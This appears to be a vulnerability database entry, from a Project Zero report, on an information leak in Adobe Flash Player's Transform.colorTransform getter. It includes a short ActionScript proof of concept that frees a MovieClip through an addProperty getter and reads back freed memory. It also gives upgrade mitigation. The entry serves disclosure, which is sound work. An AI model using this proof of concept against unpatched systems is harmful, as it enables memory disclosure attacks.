vendor:
Flash Player
by:
Project Zero
7,5
CVSS
HIGH
Information Leak
200
CWE
Product Name: Flash Player
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2015
Info Leak in Transform.colorTranform getter
There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform. A minimal PoC is as follows: this.createEmptyMovieClip( "mc", 1); var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4); var t:Transform = new Transform( mc ); t.colorTransform = c; this.createTextField( "tf", 2, 0, 0, 2000, 200); var ct = ColorTransform; var g = flash.geom; g.addProperty("ColorTransform", func, func); var q = t.colorTransform; tf.text = q.greenMultiplier + "n" + q.blueMultiplier + "n" + q.color; function func(){ mc.removeMovieClip(); return ct; }
Mitigation:
Upgrade to the latest version of Adobe Flash Player
